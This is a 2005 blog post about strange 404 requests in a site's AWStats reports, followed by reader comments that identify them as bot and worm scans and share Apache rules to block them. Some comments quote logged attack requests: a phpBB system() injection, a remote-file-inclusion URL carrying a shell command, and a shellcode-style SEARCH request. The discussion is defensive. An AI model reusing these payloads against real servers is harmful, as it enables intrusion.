404 oddities

When I look at the server logs – or rather the list of “Required but not found URLs” that AWStats creates – for this site, I find an increasing number of very strange requests for nonexistent files. Since these weird requests are repeated over and over, I’m guessing most of them are from bots looking for potential ways of hacking the site or posting spam.

That’s just a guess – I don’t know for sure what it’s all about. I’ve Googled around a bit and found reasonable explanations for some of the requests, but not all of them. Please fill me in if you know more about any of these oddities.

/cgi-bin/awstats.pl
Looking for a security hole in AWStats?
/awstats/awstats.pl
Probably the same as /cgi-bin/awstats.pl.
/_vti_bin/owssvr.dll
Requested by a “Web discussions” feature in IE/Win and probably by some worms looking for servers running Microsoft software. There are several discussions on this at Webmaster World.
/MSOffice/cltreq.asp
Same as /_vti_bin/owssvr.dll.
/_vti_inf.html
Someone trying to access the site with FrontPage?
/robotsxx.txt
Maybe you were looking for robots.txt?
/robot.txt
No, it’s robots with an ‘s’.
/333333, /444444, /666666
I think *every* document on this site has been requested multiple times with /333333, /444444 or /666666 added at the end of the URL. What are they looking for?
/css/{link}
No idea what this is.
/css/%7blink%7d
Nope, you won’t find any `blink` elements here.
abcdefghijklmn.htm
Umm?
/feed_main.xml^en^456
What’s with the circumflexes?
/favicon
You’ll have more luck if you add a file extension to that.

Have you found any other goodies in your server logs? Maybe something much weirder than any of the ones I’ve mentioned? Let’s compare!

Comments

1. April 5, 2005 by Renato Carvalho

Hmm... it's happened to me too. But I have no idea what this is =/

2. April 5, 2005 by Mike P.

I get most of those too, but this one has me stumped: /333333, /444444, /666666

What is that all about? I also get '/sumthin'. I (jokingly) figured it was some wiseass telling me to post something useful.

3. April 5, 2005 by paul haine

I get all of the above, and also /avatar.png for some reason. I have a blank robots.txt and a favicon.ico just because I was bored of seeing those two turn up in my 404s so often.

4. April 5, 2005 by Matthew Pennell

There are a few weird security sites that show up when you Google for /333333...

5. April 5, 2005 by Justin Perkins

If this is the first time you've looked at web server log files, I can see how this could be quite a surprise.

Since the webserver logs every single request that comes in on port 80 and this port is probably the most widely used, you get a lot of crap in your log files.

Most of the junk comes from zombie machines looking for other machines to infect, 99% of which are Windows machines.

A "fresh install" of Windows XP/2000 is extremely unsafe to connect to the Internet (without a firewall) because there is literally a constant flow of virii trying their best to spread their seed, most of which take advantage of the fact that lots of Windows machines have a web server running by default.

That's why it's best to view your stats in a log analyzer; they exclude the bad requests from the reporting. I only open my log files if there is a problem or I'm trying to do some extra digging. My stats program (AWStats) reports the document requested that resulted in a 404 error, so I don't need to look at the log to figure it out.

6. April 5, 2005 by Jough

I get a LOT of seemingly random English words at the ends of 404 errors, and for the life of me I can't imagine how looking for "/noncapillary/" could be of any use to anyone.

I've thought of leaving messages for web hosts in a bad request when a site doesn't include contact info anywhere. But of course they'd have to actually read their logs to find it.

7. April 5, 2005 by Justin Perkins

Nice site Jough, thanks for that.

8. April 5, 2005 by Lukasz Grabun

I've noticed quite common requests for /cgi-bin/formmail.cgi (or something like it; I could have missed a hyphen). Looking for a security hole, apparently.

9. April 5, 2005 by Roger Johansson

Justin: I haven't been checking the actual log files - I use AWStats. Guess I could have made that clear in the post. The requests I mentioned are a sample of the 404 errors that get logged. I've been wondering about some of them for quite some time so I thought I'd check what you people have to say on the matter.

10. April 5, 2005 by Justin Perkins

Hmm, that's weird because I don't see any of that type of stuff in my reporting (AWStats). Most of the sites I check the stats on are subdomains though, so maybe I should take a gander at the root domain stats to see what they look like, as I am sure they are full of this garbage.

I was sure that the stats would filter out garbage, but possibly not from the 404 reports so you can better debug.

11. April 5, 2005 by Peter Parkes

I manage a site for Emmanuel College Students' Union, and we get loads of requests designed to exploit a (now fixed) security hole in phpBB, a popular bit of forum code, which look like this:

/forums/viewtopic.php?p=3014&highlight=%2527%252E system(chr(112)%252Echr(101)%252 Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)

Initially I was surprised you hadn't come across them, but it occurred to me that the crackers probably only hit you with the requests once they've established that you actually have a phpBB forum on the site.

12. April 5, 2005 by Ben Hollis

I get tons and tons of requests for inner pages of my sites with misspellings, for example http://www.numbera.com/rome/startegy/tools.aspx (note "startegy" instead of "strategy"), even though I can't imagine anyone typing in a URL like that.

13. April 5, 2005 by Brian

I get the "/_vti_bin/owssvr.dll" and "/MSOffice/cltreq.asp" but nothing else interesting. Something keeps trying to access some old Atom feed I haven't had in a year.

14. April 5, 2005 by Dave P

I get them all too... they're all exploit attempts.

My guess on the /333333, /444444, /666666 404s is that they're trying to exploit a known buffer overflow vulnerability. It's probably from the NT 4 days, but I'm sure it still works on some servers out there.

15. April 5, 2005 by Johan Schurer

Usually many of those 404's come from worms, script-kiddies, saved pages, overcurious people and so on.

To tackle it I use the html-rewrite function in apache to rewrite all garbage 404's to a 0 size file named /youhaveaworm (or what you like).

Any further request is now logged in the access.log and the server 'sends' 0 bytes back saving bandwidth.

The only downside is you have to collect and put them in your apache config.
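A minimal sketch of that idea, assuming the "html-rewrite function" means mod_rewrite and that an empty file named youhaveaworm sits in the document root. The URL patterns are only examples taken from requests mentioned in this thread, not Johan's actual list:

```apache
# Sketch only: assumes mod_rewrite is loaded and that these lines live in
# httpd.conf (server or virtual host context), where the matched path
# keeps its leading slash.
RewriteEngine On

# Hand known junk requests a zero-byte file instead of the full 404 page.
# [PT] passes the rewritten path back through normal URL mapping.
# The patterns are examples; collect your own from the 404 report.
RewriteRule ^/_vti_bin/ /youhaveaworm [PT]
RewriteRule ^/MSOffice/cltreq\.asp$ /youhaveaworm [PT]
RewriteRule ^/cgi-bin/formmail\.(pl|cgi)$ /youhaveaworm [PT]
```

In a .htaccess file the leading slash is stripped before matching, so the patterns would start with `^_vti_bin/` and so on.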

16. April 5, 2005 by Jonathan Snook

the formmail.cgi one is an older one where some hosts would have a default email script that spammers could (ab)use to mass mail.

Other than that, my 404s have actually been looking pretty clean as of late...

17. April 5, 2005 by Vasilis

I found this site that explains some of the errors.

18. April 5, 2005 by Simone Villas Boas

I love to send small, freak notes to some geek friends through fake misspelled URLs. Something like "you-are-so-sexy,Joe" or "dont-talk-to-my-girl-again,pal". It's fun if you can see your friend's expression at the log analysis time. Unfortunately, it works only once. 8:*

19. April 6, 2005 by John Magnus

Have my share of these as well, especially requests for AWStats and phpbb. None of which have been installed on my server.

I also get a lot of requests for FrontPage-related stuff, mostly direct requests for "/_vti_bin/_vti_aut/fp30reg.dll". Don't know if it's hack attempts or just misbehaving M$ software. Have had days with more than 100 requests for "_vti_bin"-related stuff, obviously a bit annoying...

Lastly there's the CodeRed variants with requests for either "/default.ida" or "/NULL.ida". Although not nearly as numerous as the one above, it's really annoying since it consumes a fair amount of bandwidth. Really makes me wish that people would look better after their computers...

20. April 6, 2005 by Charles Martin

My personal view on some of these, including awstats, is attempts by advertisers/spammers to isolate sites with high viewership. Thus, their blog comment spam and other nefarious ways are more effective and possibly strike a larger audience.

As a side comment, your example of "blink" as you called it:

/css/%7blink%7d

is actually the same as /css/{link}, just URL-encoded: %7b is "{" and %7d is "}".

21. April 6, 2005 by gollux

/cgi-bin/awstats.pl
Looking for a security hole in AWStats?
/awstats/awstats.pl
Probably the same as /cgi-bin/awstats.pl.

Bingo on the Security hole in AWStats, make sure you're up to the proper level. There was a Secunia notice on this.

22. April 6, 2005 by gregR

Details on the AWStats exploit at ISC:

http://isc.sans.org/diary.php?date=2005-03-31
http://isc.sans.org/diary.php?date=2005-03-03
http://isc.sans.org/diary.php?date=2005-03-02

First time I've seen Infocon at a colour other than green, BTW (06:13:44 GMT Apr 06 2005)

23. April 6, 2005 by Ben

This post made me smile.

:)

Then again, involving oddities is generally amusing.

24. April 6, 2005 by GrumpySimon

Welcome to the 'net folks. Most of these are likely to be some script kiddie scanning an ip range.

However, both AWStats and phpBB have had some major security holes discovered recently (last few months). Make sure you've upgraded all your software (and PHP as well, to 4.3.10 at least).

Peter Parkes: The phpBB exploit uses Google to find vulnerable phpBB installations (IIRC it googles for a version number in the page footer).

As for the _vti_bin ones - I just get Apache to forbid (403) any requests there.

Another common scan to look out for is people checking to see if you're an open proxy. This basically comes in as a request for a big website like www.microsoft.com, www.intel.com or an open proxy checker on www.helllabs.com.

If anyone's interested, I'll post some Apache configuration directives to 403 them.

--Simon

25. April 6, 2005 by GrumpySimon

More info:

the abcdef... thing appears to be a scan from a bot in the Chinese ip range. It seems to be hammering sites looking for this page. Anyway, it doesn't seem to obey robots.txt, so kill it.

More info: ejhweb.com

The robotsxx.txt is a bot: PlantyNetWebRobotV1, out of hinet.com in Taiwan, and obviously doesn't obey bot rules. Ban it.

--Simon

26. April 6, 2005 by Tommy

I get lots of those as well, although I haven't seen the numeric ones yet. Lots of attempts to find formmail scripts, but then again, I know quite well spammers have found my blog. :(

I've had quite a few requests for /mobots.txt as well. A dyslexic spider? :)

27. April 6, 2005 by Jens Wedin

I have about the same as you do. Some other things that bug me.

The first post I wrote in my blog gets hit really hard by robots (3 times as much as my most popular post); not sure why.

Some hacker stuff:

  • /?p=http://www.geociNOTSPAMties.com/blackengine2004/ilustrator.txt?&cmd=ls%20-al

  • /phpmyadmin/css/phpmyadmin.css.php?lang=en-iso-8859-1&jsframe=right&jsisDOM=1

Nice to see what people really are doing at your site; the worrying thing is that you can never be sure if they have hacked the server. If they are good, they would remove all their traces in the logs. Hopefully this has not happened. :D

PS. Had to add NOSPAM into the url so I could get around the spam filter on this blog.

28. April 6, 2005 by AndrewF

My site emails me with 'broken links'---404s where the referrer is my site.

I see a lot of spoofed-referrer attempts for "/cgi-bin/formmail.pl", and many, many variants (I don't have a cgi-bin directory).

The odd thing is that I rarely see requests for the same variant. Some examples:

  • /cgi-bin/email_wm.cgi
  • /cgi-bin/formmail.cgi
  • /cgi-bin/cgiemail/form.mail
  • /cgi-local/mail.cgi
  • /cgi-bin/cgiemail/forms/order.txt

...and so on

29. April 6, 2005 by Robert Wellock

The most common Script Kiddie attack/requests I tend to receive daily are: "/cgi-bin/formmail.pl" from Thailand, Mexico, Africa and such places though obviously they must think I am stupid if they are looking for that file there.

Maybe they are short of money and would like a free spam-mail box. ;-)

Yes, I have seen such oddness as "/_vti_bin/owssvr.dll" or "/MSOffice/cltreq.asp" from what appears to be MSIE 6.0 on NT on an all-too-regular basis.

Also, a few website rippers get logged looking for weird directories on my Beck Site, and last month a Novell Cache Server went berserk looking for a file I had sitting on my other server all along; the thing was requesting it every second for long periods of time...

Some odd results come from Agents looking for image files I have commented out in my CSS files using: /* url("image.jpg");*/ now that is peculiar.

I always tend to trace the IP ranges if they look suspect.

30. April 6, 2005 by Jeff Louella

I get this all the time on my FTP server also. I laugh at some of the usernames and passwords they try.

31. April 6, 2005 by Henrik Lied

Inspired by this post, I went through my own server logs and came across a lot of strange things. I assembled the top five into a blog post.

One difference from Roger's info is that my serverlogging-system prints out a few more things, for instance the IP-address and UA of the visitor.

32. April 6, 2005 by Roger Johansson

Charles: Ah, I missed that URL encoding. I guess "blink" stood out too much and caught my attention, eh ;-)

For those suggesting that AWStats should be updated to plug the security hole: thanks, I have that covered, plus the AWStats directory is named something else and requires a login and password to access.

Jens: Yeah sorry about that. It's an unfortunate side-effect of the measures I've taken to prevent comment spam.

GrumpySimon: Some of those Apache directives would be interesting, so please post them.

33. April 7, 2005 by Michael Newton

A couple of suggestions, if you're running Apache with some control over it:

1) Tag bad requests using SetEnvIf, e.g. requests from people without User-Agent strings, or with fishy ones, and common script-kiddie attacks like the ones you mention above.
2) Dump all these requests into a separate log, so they're not in your main log cluttering things up and skewing your statistics.
3) Deny the tagged requests access.
4) Set up a virtual host with your server's IP address as its ServerName and block all requests on that vhost. How many legitimate visitors are going to visit your site by IP address?

This is how I do it. Works well for me. But then, my server is in my bedroom on a cable modem. Not so easy if you're buying hosting from someone!
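A rough sketch of the first three steps, using the Apache 2.0/2.2 access-control syntax seen elsewhere in this thread. The variable name `bad_req`, the log file names, and the URL patterns are all made up for illustration, and the `combined` log format is assumed to be defined by a LogFormat line, as it is in the stock httpd.conf:

```apache
# 1) Tag suspicious requests (mod_setenvif). "bad_req" is a made-up name.
SetEnvIf User-Agent "^$" bad_req
SetEnvIf Request_URI "^/(_vti_bin|MSOffice)/" bad_req
SetEnvIf Request_URI "/formmail\.(pl|cgi)$" bad_req

# 2) Keep tagged requests out of the main log and write them to their own.
CustomLog logs/access_log combined env=!bad_req
CustomLog logs/bad_requests_log combined env=bad_req

# 3) Refuse the tagged requests with a 403.
<Location />
    Order Allow,Deny
    Allow from all
    Deny from env=bad_req
</Location>
```

Newer Apache versions (2.4 and later) replace Order/Allow/Deny with Require directives, so step 3 would need adapting there.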

34. April 7, 2005 by Jens Meiert

Well, I know (some of) those errors, too. Another popular phenomenon causing errors is IRI modification, of course (when people guess at an IRI - some people, for example, try to access a "de" path on http://uitest.com/en/check/, and it currently really draws in IRI hackers).

However, I recommend activating the "CheckSpelling" directive on Apache servers, which can correct some IRI spelling errors (for example, if someone forgets a letter or a single character is wrong). Simply add the following line to your .htaccess:

CheckSpelling On

Performance losses are usually minimal, but the benefits are high (happier users, happier error logs).
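A slightly more defensive variant, as a sketch: CheckSpelling is provided by mod_speling, and an unknown directive in .htaccess makes the server answer every request with a 500 error, so it may be worth guarding the line. This assumes the host allows the directive in .htaccess at all (AllowOverride Options):

```apache
# Only apply the directive when mod_speling is actually loaded.
<IfModule mod_speling.c>
    CheckSpelling On
</IfModule>
```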

35. April 7, 2005 by Mark Reeves

I also get /sumthin. We get it from at least 3 different IP addresses 40 or 50 times a month usually in groups of 3 requests in close proximity.

Give it up already - you are getting nuthin!

36. April 7, 2005 by John Whittet

/index.com? That's an odd one...

37. April 7, 2005 by SugarKane

I get all the above and more. But the ones that confuse me are things like: /pelikansio/makatea.htm .... the file name is correct but the directory does not exist and never has. I get a heap of these, with each non-existent directory having a nonsensical name. Who or what makes up these directory names?

38. April 8, 2005 by GrumpySimon

I use these commands in my httpd.conf. The first stops the CONNECT:1:3:3:7 attempt which is a scan to see if your server allows tunneling proxy servers (and is often used by spammers).

The second forbids any access to /cgi-bin/ and /_vti_bin/. I don't have anything in cgi-bin on my server, but you may need to allow this.

You can modify these (change the location bit) to include anything else which is getting requested often.

--Simon

#Stops those dodgy CONNECT:1:3:3:7 Scans and 403's them

   
      Order Deny,Allow
      Deny from all
   


# 403 all cgi-bin and _vti_bin requests

   Deny from all


   Deny from all

39. April 8, 2005 by GrumpySimon

Bah, eating my brackets.

#Stops those dodgy CONNECT:1:3:3:7 Scans and 403's them
<Location />
   <Limit CONNECT>
      Order Deny,Allow
      Deny from all
   </Limit>
</Location>

# 403 all cgi-bin and _vti_bin requests
<Location "/cgi-bin">
   Deny from all
</Location>
<Location "/_vti_bin">
   Deny from all
</Location>

40. April 8, 2005 by Roger Johansson

GrumpySimon: Thanks for sharing. I'll take a look at implementing that to clean things up.

Sorry about the preview eating your brackets. It's a long-standing problem with Movabletype that I don't know how to fix. I'd much appreciate any help with fixing that, so if anyone knows anything about it...

And to whoever is having fun sending me nice little messages by requesting non-existent files: I keep an eye on the list of 404 errors to detect any broken links or other problems. I also tend to add a redirect if someone posts a broken link to one of my articles in a forum or on a mailing list. That happens quite a lot, actually. I figure it's better if I redirect those people to the document they are looking for instead of letting them end up on my 404 page. Getting rid of all the nonsense requests would make any such problems much easier to find.

41. April 9, 2005 by Joonas

In SugarKane's example /pelikansio/makatea.htm, the directory name is in fact a Finnish word. Its meaning is 'game folder' so it would make sense if someone had a directory named just that. Perhaps these bots are ripping directory names from other people's sites, although I can't really find any sense in doing that.

42. April 10, 2005 by Arve

Some oddities from my own logs:

  • /feeds/rss%22%20type=application/rss+xml%20rel=alternate%3E%3CLINK%20title=
  • /quark/archives/C:\Folder\file.txt
  • /archives/2005/04/submit-it-and-google-tos-violations/ - I have extensionless files, not directories. These requests seem to be made by a spam harvester, so I don't worry too much that they 404.
  • /gallery/css/rounded/Rounded%20Corners%20in%20CSS%20-%20Virtuelvis_files/top-right.png - some program seems to have problems with Save as.
  • /archives/http:
  • /feeds/bmrss%22%3ERSS%3C/A%3E)%3C/P%3E%0D%0A%3CH3%3E%3CA%20href= - most likely some attempt at using my feeds as a redirector, something which will fail horribly.

43. April 10, 2005 by Ryan B

The general css/{link} request can be a result of people exploring your CSS (I am guilty of this). In Safari you can open the activity viewer and double-click a CSS file to view it. Safari opens the CSS file in a new window, resulting in a direct request for said file; therefore the server records that as a request (just wanted to make it clear). There is a technique out there to hide CSS from direct access; I believe PHP was used, and it would give a message like "thanks for taking interest in my css..." when you try to access it. But for the life of me, or about 30 mins, I can't find the blog. The blog also features a content shadow technique that was impressive. Dark blue and red color scheme, if anybody knows it ;-)

44. April 11, 2005 by Stefano

Maybe it's due to some spam programs... When you get a 404, the email address of the site owner is displayed.

45. April 12, 2005 by guest

me too~!

46. May 1, 2005 by Lansing

I'm running my webserver on a linux box, however that doesn't stop all those skiddies from trying to get a 'cmd.exe' shell. Sadly, it isn't just once or twice, it is HUNDREDS of times.

47. May 10, 2005 by Vincent Grouls

Maybe it's due to some spam programs... When you get a 404, the email address of the site owner is displayed.

This is an option in the Apache configuration. You can disable it for every Virtual Host or globally. The directive is named ServerSignature. Set it to On or Off instead of Email.
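For reference, a minimal sketch of that setting. It can go in the global configuration or inside a single virtual host block:

```apache
# Footer on server-generated pages (such as the default 404 page):
#   On    - server version and host name
#   EMail - as On, plus a mailto: link to the ServerAdmin address
#   Off   - no footer at all
ServerSignature Off
```

The address shown with EMail is whatever ServerAdmin is set to, so changing that directive is another way to keep a personal address off error pages.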

I used to get a lot of requests from hinet.com on port 25 but since I've blocked them they haven't returned :=D

Anyone ever come across this one though?

[07/May/2005:11:55:46 +0100] "SEARCH /\x90\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9\xc9...

It goes on for another 300 characters...

[Edit: Removed a very long line. /Roger]

48. August 3, 2005 by Jack Vinson

I've noticed an entertaining 404 error in my logs recently: A robot of some sort is trying to access a valid URL, but they've surrounded one of the words in the file name with HTML markup. Thus far it's only been the bold markup. I can write an .htaccess directive to strip the markup - should I?


About the author

Roger Johansson is a Swedish web professional specialising in web standards, accessibility, and usability.
